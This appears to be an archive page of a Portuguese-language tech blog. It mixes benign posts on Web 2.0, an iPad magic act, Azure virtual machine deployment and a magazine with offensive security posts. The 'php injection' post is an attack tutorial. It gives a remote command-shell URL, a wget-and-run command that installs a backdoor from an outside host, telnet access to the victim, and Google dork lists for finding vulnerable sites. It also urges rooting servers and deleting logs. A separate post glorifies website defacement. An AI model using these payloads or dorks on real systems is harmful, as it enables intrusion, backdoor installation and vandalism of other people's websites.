Arquivo

Archive for the ‘Artigos’ Category

Web 2.0

14 de junho de 2011 Deixe um comentário

O conceito fundamental da Web 2.0  é desenvolver aplicativos que aproveitem a capacidade da Internet para se tornarem melhores conforme são utilizados pelas pessoas, usando para isso a inteligência coletiva. Exemplos de aplicativos desse tipo são blogs (como o Novo na Rede, o GF Soluções), wikis (como a Wikipédia) e redes sociais (como o Orkut, facebook, twitter e mais recentemente o Google Buzz).
Web 2.0 significa desenvolver aplicativos que utilizem a rede como uma plataforma. A regra principal é que esses aplicativos devem aprender com seus usuários, ou seja, tornar-se cada vez melhores conforme mais e mais gente os utiliza. Web 2.0 significa usar a inteligência coletiva.
A web 2.0 alcançou sucesso por utilizar um dos fatores que contribuíram para o crescimento da internet como meio de comunicação e entretenimento, ou seja, à constatação de que na internet o usuário tem uma experiência totalmente diferente da obtida com a televisão ou qualquer outro meio de comunicação.
Enquanto a televisão transmite o seu conteúdo para o usuário, sem nenhuma interação, a internet possibilita ao usuário criar seu próprio conteúdo, participando dele ativamente por intermédio de blogs, wikis e redes sociais, acrescentando, modificando, transformando essa notícia e gerenciando o que deseja ou não receber, ler e comentar diariamente.
web 2.0 tem sua base na participação, na colaboração online e na certeza de que as pessoas querem criar conteúdo em vez de apenas consumir, uma visão totalmente diferente do início da web quando só podíamos nos sentar a frente do computador e ler as matérias que nos eram apresentadas.
Alguns exemplos de aplicativos web 2.0 muito difundidos são:
Anúncios
Categorias:Artigos

Mágica + iPad: com muita criatividade, artista faz ‘milagres’ na tela do tablet

6 de junho de 2011 1 comentário

É claro que não se trata da “versão beta do iOS 5”, como Simon Pierro diz logo no início do vídeo. Mas este mágico e ilusionista alemão inventou algumas funções bastante curiosas e divertidas para o tablet da Apple.

Nesse sistema operacional, imagens saltam da tela e se transformam em objetos reais. A conexão entre espaço e tempo, além da interação com os objetos exibidos na tela, são o sonho de muitos de nós!

Não entendeu? Assista ao vídeo abaixo. Você compraria um iPad assim?

Categorias:Artigos, curiosidades

php injection

3 de junho de 2011 Deixe um comentário
Muita gente tem duvidas sobre PHP Injection, provavelmente a vulnerabilidade mais comum entre defacers/owners.
A vulnerabilidade acontece por desconhecimento do webmaster, ou por distração, eles colocam ‘includes’ para ajudar na criação do seu site sem fazer nenhuma verificação das ‘strings’
Um exemplo de um site vulneravel, com 3 partes em uma tabela:
include(‘topo.php’);
include(‘menu.php’);
include($page);
Existem várias strings, a mais comum é page..
Neste exemplo ele carregaria a página novidades.php do site.. Se ela for vulneravel dá para ‘injetar’ páginas maliciosas que executam comandos na maquina que roda o site , olha que legal dai o nome “PHP Injection”
Usando esse script como referencia :
http://kmzrox.by.ru/cmd.gif?&cmd=ls
Obviamente você tentaria: http://www.alvo.com.br/index.php?page=h … if?&cmd=ls
Ops! Se a página for vulneravel ela vai carregar! Se ela funcionar e não estiver em safe mode (uma opção do php.ini) vai listar os arquivos do site (comando ls).
Não é só isso, a partir daqui você usa a sua criatividade, rodar backdoor para ter acesso remoto (por telnet/putty), pacotar pessoas e servers, configurar psybnc, etc.. Só precisará saber alguns comandos de Linux/FreeBSD/SunOS..
Backdoor: kmzrox.by.ru/r0nin
Para usar coloque no ‘cmd’ cd /tmp;wget kmzrox.by.ru/r0nin;chmod 777 r0nin;./r0nin
entra na pasta tmp, baixa a backdoor (exploit), coloca permissão para o arquivo e roda ele
Por exemplo: http://www.alvo.com.br/index.php?page=h … in;./r0nin
Se tudo ocorrer bem e não tiver firewall agora vá iniciar > executar > telnet http://www.alvo.com.br1666, pronto, você está na maquina, enjoy! 
Para procurar no google as páginas separei uma lista de chaves, lembrando que você pode usar inurl:”.pt” (escolhendo a classe do dominio) para procurar páginas somente de um país.
allinurl:”.php?page=”
allinurl:”.php?inc=”
allinurl:”.php?body=”
allinurl:”.php?main=”
allinurl:”.php?pag=”
allinurl:”.php?p=”
allinurl:”.php?content=”
allinurl:”.php?cont=”
allinurl:”.php?c=”
allinurl:”.php?meio=”
allinurl:”.php?x=”
allinurl:”.php?cat=”
allinurl:”.php?site=”
allinurl:”.php?m=”
allinurl:”.php?do=”
allinurl:”.php?x=”
allinurl:”.php?content=”
allinurl:”.php?pagina=”
allinurl:”.php?root=”
allinurl:”.php?include=”
allinurl:”.php?open=”
allinurl:”.php?visualizar=”
allinurl:”.php?conf=”
Agora é simples, você tem os sites pra procurar e uma cmd, agora é só ir de página em página substituindo os valores da string page para o cmd que vai usar
Você pode utilizar exploits para tentar conseguir root (super user) na máquina, assim ter permissão para fazer o que quiser com os sites que estão dentro dela, apagar todos os logs, etc.
Aqui vai uma lista de páginas vulneraveis (depois de ler isso vocês já saberão o que fazer), a maioria está protegida ou com firewall, é só para mostrar o que vai acontecer quando uma página é vulneravel.
Páginas com passthru() bloqueados, quando não aparece nada na box são ignorados, entao continue procurando . Comentem e ajuem a complementar.
Ah uma shell muito utilizada é a c99shell .

Computação em nuvem: leve suas máquinas virtuais para a nuvem [Cloud Computting]

31 de maio de 2011 Deixe um comentário

A execução de máquinas virtuais no Windows Azure combina os benefícios da virtualização e da computação em nuvem.


A mudança constante é um pilar do setor de TI. Novas tecnologias, hardware, software e protocolos de comunicação são apresentados todos os dias. Essa grande quantidade de tecnologias novas cria um cenário dinâmico que aprimora a maneira como conduzimos os negócios, nos comunicamos e compartilhamos conhecimentos. Em meio ao turbilhão de mudanças, as duas transformações mais significativas que vimos no mundo de TI nos últimos anos foram a virtualização e a computação em nuvem.
A virtualização ajuda as empresas a usar os recursos de hardware com mais eficiência. Ela possibilita um nível mais alto de abstração do ambiente do software a partir do hardware. Agora, os servidores existem com um único arquivo. É possível movê-los de um hardware para o outro, duplicá-los quando desejar e criar uma infraestrutura mais escalonável e flexível.
A computação em nuvem aumentou ainda mais esse nível de eficiência e agilidade atingido pela virtualização. Por meio de recursos em pool, diversidade geográfica e conectividade universal, a computação em nuvem facilitou o fornecimento de softwares hospedados, plataformas e da infraestrutura como um serviço. Ela é, ao mesmo tempo, uma nova plataforma tecnológica e um novo modelo de negócios.
Com a introdução da função de máquina virtual (VM) na plataforma Windows Azure, esses conceitos poderosos se unem para hospedar a infraestrutura virtual na nuvem. Em breve, você poderá criar VMs para o Windows Azure e implantá-las na nuvem, onde será possível aproveitar a infraestrutura flexível e escalonável, bem como as economias de custos pelas quais a computação em nuvem é conhecida.
Atualmente, a função de VM do Windows Azure ainda está na versão beta. Mais informações sobre o programa beta podem ser obtidas no site Computação do Windows Azure. É possível solicitar a versão beta visitando a seção Programas Beta do Portal de Gerenciamento do Windows Azure. Devido a esse status beta, as informações aqui contidas relacionadas à função de VM estão sujeitas a alterações.

Criação para a nuvem

A função de VM do Windows Azure é similar a outras funções de servidor. As VMs no Windows Azure executam uma versão do SO Windows Server. A diferença da função de VM é que você pode criar, personalizar e gerenciar a imagem do servidor para atender às suas necessidades e especificações.
Há algumas diferenças operacionais das quais você deve estar ciente ao executar sua VM no Windows Azure, e não em um hardware local. Primeiro, algumas funcionalidades relacionadas à rede são restritas. Por exemplo, para usar o protocolo UDP, você também deve usar o Windows Azure Connect. Além disso, uma instância da função de VM em execução no Windows Azure não tem um estado de persistência.
É aconselhável usar os serviços de armazenamento do Windows Azure para persistir o estado, gravando-o em um blob ou em uma unidade do Windows Azure. Para obter mais detalhes sobre como fazer isso, consulte “Como desenvolver um adaptador para uma função de VM no Windows Azure”.
Os dados gravados no diretório local de armazenamento de recursos são persistentes quando ocorre uma recriação da imagem de uma instância do servidor. No entanto, você pode perder esses dados em caso de falhas temporárias no Windows Azure que exigem que você mova sua instância de função de VM para um hardware diferente.
Com essas condições em mente, o processo de criação de uma VM para o Windows Azure é similar ao de criação de qualquer outra VM. Comece pela criação de um disco rígido virtual (VHD) de base, criando um VHD em branco com o Gerenciador do Hyper-V, modificando um VHD existente ou convertendo uma instalação de servidor físico para um VHD. (Para obter mais informações, consulte “Fontes de novas máquinas virtuais”.)
A imagem base contém o SO (que deve ser o Windows Server 2008 R2), quaisquer personalizações no SO e os aplicativos necessários. Você deve habilitar a função Hyper-V de dentro do Gerenciador de Servidores, além de instalar o SDK do Windows Azure (que inclui os Componentes de Integração do Windows Azure). Também é uma boa ideia incluir a mídia de instalação do Windows Server 2008 R2 (geralmente um arquivo ISO) na imagem base, caso ele seja necessário para tarefas como a instalação de componentes adicionais.
Em seguida, instale os Componentes de Integração do Windows Azure. Eles são necessários em todas as imagens de servidor antes que seja possível carregar as imagens para o Windows Azure. Esses componentes são iniciados todas as vezes que o SO é iniciado, e integram o SO da função de VM ao Windows Azure.
Os componentes trabalham com o balanceador de carga para comunicar o estado das instâncias. Os componentes também inicializam a VM ao instalar os certificados e criar diretórios locais de recursos com base nas configurações de definição do serviço. Você encontra etapas detalhadas para a instalação dos componentes em “Como instalar os Componentes de Instalação do Windows Azure”.
O desenvolvimento de um “adaptador” é uma próxima etapa opcional no processo de criação de imagens. Quando você desenvolve e carrega uma imagem de servidor personalizada, está instalando e configurando um software para ser executado no ambiente dinâmico do Windows Azure. Pode ser necessário fornecer informações de configuração para o seu aplicativo que talvez não estejam disponíveis no momento do desenvolvimento. Você terá que coletá-las em tempo de execução. É aconselhável configurar seus aplicativos para o ambiente dinâmico ao criar um adaptador que interaja com o Windows Azure, prepare e execute seu aplicativo.
Você tem duas opções para criar um adaptador:
  • Você pode criar um adaptador que seja executado durante a fase de especialização. Isso ocorre quando o SO está sendo configurado, depois de carregar a imagem do servidor para o Windows Azure pela primeira vez ou depois de recriar a imagem de uma instância. Você pode criar esse adaptador sem escrever códigos, usando uma das duas abordagens. Execute um script do arquivo de resposta ou de um provedor criado para a Ferramenta de Preparação do Sistema (sysprep). Para obter mais informações, consulte a seção “Crie um projeto de configuração para o adaptador” da página “Como desenvolver um adaptador para uma função de VM no Windows Azure” da Biblioteca MSDN.
  • Você pode criar um adaptador como um serviço do Windows — que inicia automaticamente cada vez que o SO é iniciado. Você pode criar esse tipo de adaptador em código gerenciado ou nativo. Ele usa a API de tempo de execução de serviço do Windows Azure para coletar dados dinâmicos do ambiente do Windows Azure. Para obter mais informações, consulte a seção “Defina o que acontece quando o adaptador é iniciado” da página “Como desenvolver um adaptador para uma função de VM no Windows Azure” da Biblioteca MSDN.
A etapa final para preparar a imagem do seu sistema que será carregada para o Windows Azure é avaliar a configuração do Firewall do Windows. Você deve abrir todas as portas que o seu aplicativo precisará depois que for executado na instância da função de VM no Windows Azure. O seu serviço hospedado deve usar portas locais fixas. Você pode especificar os números das portas para os pontos de extremidade que definir para qualquer função do Windows Azure — independentemente se for da Web, de trabalho ou de VM.
Depois de concluir o processo de instalação e de configuração, a etapa final na criação da sua imagem é prepará-la para ser carregada no Windows Azure. Para isso, você usará a ferramenta sysprep. A ferramenta sysprep “generaliza” a imagem, removendo identificadores de segurança (SIDs) únicos para que o Windows Azure possa restabelecê-los em cada uma das instâncias quando a máquina for implantada. Para concluir a preparação da imagem final:
  • Abra uma janela do prompt de comando como administrador.
  • Altere o diretório para %windir%\system32\sysprep e, em seguida, execute o sysprep.exe.
  • Na caixa de diálogo da Ferramenta de Preparação do Sistema, selecione Enter System Out-of-Box Experience (OOBE) para a System Cleanup Action.
  • Certifique-se de que Generalize esteja selecionado.
  • Selecione Shutdown para as Shutdown Options.
  • Clique em OK.
Quando a operação do sysprep estiver concluída, a VM será desligada. Agora, você está pronto para a implantação.
Implantação de uma VM no Windows Azure
A primeira etapa para a implantação da imagem do seu sistema é a configuração dos certificados de serviço e de gerenciamento. Quando você carrega um arquivo .vhd para o Windows Azure, ele usa um certificado x.509, salvo como um arquivo .cer, para autenticação (chamado de certificado de gerenciamento no Portal de Gerenciamento do Windows Azure). Você também precisará de um certificado de troca de informações pessoais, salvo como um arquivo .pfx (chamado de certificado de serviço no Portal de Gerenciamento do Windows Azure), se planejar acessar remotamente a instância da função de VM.
Você pode autoassinar esses certificados. Em outras palavras, não será necessário adquiri-los de provedores de terceiros. Você mesmo pode criá-los com a ferramenta makecert.exe. Há instruções detalhadas para a criação dos seus certificados em “Como criar um certificado para uma função”.
Depois de criar o seu certificado, você pode adicioná-lo ao Portal de Gerenciamento do Windows Azure. Selecione Hosted Services, Storage Accounts & CDN e, em seguida, clique emManagement Certificates ou Hosted Services (para certificados de serviço).
Você precisa do identificador de assinatura para carregar o VHD. Você pode copiar e colar as informações do Portal de Gerenciamento na linha de comando. Para encontrar a ID da assinatura e a impressão digital do certificado:
  1. Faça logon no Portal de Gerenciamento.
  2. Clique em Hosted Services, Storage Accounts & CDN e, em seguida, clique emManagement Certificates.
  3. No painel Properties, você pode encontrar a impressão digital do certificado em Thumbprint. O identificador de assinatura está em Subscription ID.
Depois que tiver encontrado a impressão digital do certificado e o identificador de assinatura, você poderá carregar o VHD.
Para carregar a imagem:
  1. Abra uma janela do prompt de comando do SDK do Windows Azure como administrador.
  2. Altere o diretório no qual a imagem VHD foi salva.
  3. Configure a cadeia de conexão com o comando a seguir e substitua SubscriptionId e CertThumbprint pelos valores de sua assinatura:
csupload Set-Connection “SubscriptionId=SubscriptionId; CertificateThumbprint=CertThumbprint”
  1. Carregue o VHD com o comando a seguir e substitua o nome do arquivo e o nome exibido do VHD:
csupload Add-VMImage –LiteralPath VHDName.vhd –Location LocationValue –Name DisplayedNameInPortal
Será exibida uma caixa de diálogo para a Ferramenta de Verificação de VHD do Windows Azure. Essa ferramenta verifica se o SO está no estado adequado e pronto para ser carregado para o Windows Azure. Clique em OK para continuar o processo de carregamento.
Observe que os parâmetros –LiteralPath e –Location (ou –AffinityGroup) são necessários. O parâmetro –Name é opcional. O local ou grupo de afinidade deve corresponder ao local ou grupo de afinidade definido para o serviço hospedado correspondente.
A criação de um modelo de serviço é a etapa final para a implantação. Para que uma instância da função de VM seja executada no Windows Azure, você deve definir o modelo de serviço criando a definição e os arquivos de configuração do serviço. Para obter instruções detalhadas, consulte o artigo da Biblioteca MSDN, “Como criar e implantar um modelo de serviço da função de VM”.
Agora que a sua VM está pronta para execução no Windows Azure, você deve manter uma cópia local do VDH original como backup de segurança. Caso queira fazer alterações no VHD no futuro — para aplicar atualizações ou atualizar os aplicativos, por exemplo — você pode usar discos diferenciais. Você encontrará instruções detalhadas sobre o uso dos discos diferenciais para fazer a manutenção da sua VM aqui: “Introdução à alteração de uma imagem do servidor para uma função de VM no Windows Azure.




Escrito por: Joshua Hoffman

Categorias:Artigos

Palestra – SQL Injection-Pwining a Windows Box!

31 de maio de 2011 Deixe um comentário

Palestra sobre SQL injection confiram….

Categorias:Artigos, sqlinjection

Um pouco sobre defacer

29 de maio de 2011 Deixe um comentário

Confira este < post  > Que esclarece o que é um defacer

Porque fazer um defacer?

Seria pura ignorância do que vos escreve dizer que algum um dia alguma pessoa ou alguém que seja ligado ao mundo “hacker” nunca passou por isso, nunca alterou uma página e teve seus quinze minutos de fama. Eu já fiz isso, porque você que está lendo e se considera um hacker nunca fez? Portanto, mesmo os mais “elite”, que se acham os super-hackers e saem por aí xingando os defacers, já fizeram isso pelo menos uma vez, mesmo que neguem.
Na realidade, fazer um deface dá ao praticamente um prazer indescritível. Sim, o ato de alterar uma página dá um prazer imenso. Um prazer que dura entre 10 e 20 minutos, começa na hora que o defacer explora um bug qualquer – sendo o sistema operacional Linux ou Windows, sendo o serviço explorado SSH ou FTP – e faz o upload do documento HTML criado por ele. Após o upload feito com sucesso, vem a parte mais estrondosa: não tem como descrever o que o defacer está pensando nesse momento; a única coisa que sabemos é que ele irá clicar no Atualizar ou Reload do seu navegador, e simplesmente ver por pelo menos 20 minutos – que, às vezes, podem chegar a 1 ou 2 dias – sua arte à mostra para o mundo inteiro. Pode-se dizer que é a mesmo sensação que um jogador de futebol sente quando marca um gol.

Qual é o objetivo de um defacer?

Qual será o objetivo de pessoas que alteram uma página na Internet? Se mostrar, se divertir ou dinheiro? Não, a maioria deseja fama, os famosos 15 minutos de fama. Para isso, o objetivo do defacer é chamar a maior atenção possível, pois se o site que foi alterado for um site famoso, eles terão um crédito maior, tanto na imprensa quanto nos sites que contabilizam os mirrors.

Qual é o S.O. mais explorado pelos defacers?

O sistema operacional mais explorado por um defacer é o Windows. Nossa! Mas porque o Windows? Porque o Windows é o sistema operacional mais bugado do mundo! Isso todo mundo sabe, o Windows em mãos erradas não é um sistema seguro. Tanto o Linux quanto outros sistemas operacionais também têm diversos bug’s, e se não forem bem administrados, também não serão seguros, mas o problema maior que ocorre com o Windows é que a maioria das vulnerabilidades é fácil de se explorar: basta o defacer ter um compilador perl, que ele poderá executar comandos arbitrários em muitos sistemas rodando Windows  – ainda mais agora, que já existem ferramentas feitas para rodar em Windows que exploram as vulnerabilidades mais simples, como msadc e unicode. Essas ferramentas são capazes de fazer tudo para o defacer, desde executar comandos até  fazer upload dos arquivos, pois já vêm com os comandos e strings inclusos em seu código, tornando o ato do deface muito mais fácil. Explorando um bug como o msadc e o unicode pelo navegador, o deface precisaria incluir a string a ser explorada no servidor direto no navegador. Para fazer um upload de um HTML (index.htm, default.htm etc…), o defacer gastaria um pouco mais de neurônios.

As empresas e os defacers

As empresas são as que mais sofrem nas mãos dos pichadores virtuais. Quando o defacer altera uma página, ele busca fama, querendo que todos vejam sua arte. Se o site alterado for de uma grande empresa, tanto na área relacionada à Internet quanto fora, ele causará uma grande repercussão, pois, com certeza, seu ataque será divulgado por alguns meios de comunicação, como sites de noticias sobre informática, e até mesmo na televisão. Por esse motivo, as grandes empresas são as mais visadas nesse meio de defacers e empresas. Não que uma pequena empresa não seja visada – o defacer está sempre de olhos bem abertos, e se o servidor dessa pequena empresa cruzar com ele, o ataque também ocorrerá.
A maior parte da culpa pela ocorrência desses ataques é das próprias empresas que fazem a segurança ou administram os servidores que estão hospedando as páginas. As empresas preferem não denunciar um ataque a ter seu nome e credibilidade em jogo. Porque se o ataque  sofrido for divulgado, muitas pessoas (clientes ou possíveis clientes da empresa atacada) ficarão sabendo . Veja da seguinte maneira: você é dono de um grande banco, que dá aos seus clientes a opção de acessar suas contas via Internet Banking – um meio não muito seguro usado hoje por muitas pessoas. Suponhamos que o banco sofra um ataque. O que seus clientes pensariam quando isso caísse como uma bomba nos meios de comunicações? Seu banco sofreria uma grande descriminação por parte de todos, você perderia clientes, e sua empresa iria à falência.

Pode ser sério !

Na maioria das vezes, quando uma página é alterada, o invasor tem pouco conhecimento. Isso pode se tornar perigoso a partir do momento em que o invasor for um verdadeiro hacker, e não tiver o intuito de alterar apenas a página, e sim roubar dados. Roubar sigilosos da empresa de clientes e cartões de créditos é o mínimo que pode ocorrer quando um hacker entra em algum sistema. O que causa mais medo nos administradores é o fato de que um invasor desse tipo não quer aparecer, tornando sua detecção cada vez mais difícil.
Categorias:Artigos

Revista W

26 de maio de 2011 Deixe um comentário

Bom cheguei ao conhecimento desta revista, através de um amigo meu , o joão que faz curso comigo  , levou duas revistas pra mim , li uma e de cara gostei , atualmente esta na edição N° 131, é uma ótima opção para quem busca artigos sobre tecnologia , tutoriais , como fazer , em fim vale apena comprar . 
Com conteúdo licenciado da revista .NET, da Future Publishing, da Inglaterra, reúne reportagens e entrevistas com designers, desenvolvedores e gestores que são referência mundial na indústria de internet e artigos técnicos de profissionais do Brasil e do Exterior. Hoje, o melhor canal para as empresas que buscam falar e mostrar os seus produtos e serviços para os profissionais que definem tudo o que é relacionado ao ambiente on line em suas empresas.

Categorias:Artigos